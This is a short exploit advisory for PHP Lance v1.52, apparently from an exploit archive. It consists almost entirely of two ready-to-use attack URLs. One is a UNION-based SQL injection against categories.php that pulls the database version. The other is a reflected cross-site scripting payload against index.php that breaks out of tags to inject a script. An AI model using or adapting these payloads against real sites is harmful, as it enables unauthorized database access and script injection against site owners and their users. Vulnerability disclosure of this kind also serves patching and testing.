id: 18465
date: 06/07/2012
title: PHP Lance v1.52 SQL / XSS Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

PHP Lance v1.52  Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.scriptdemo.com/
.:. Tested On Demo : http://www.scriptdemo.com/php-lance/
#######################################################################

===[ Exploit ]===


Sql Injection
==============

http://SITE/categories.php?catid=null'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24-- -


Reflected Xss
==============


https://SITE/index.php?id='"--></style></script><script>alert(1337)</script>

####################################################################### 



#  0day.today [2023-03-23]  #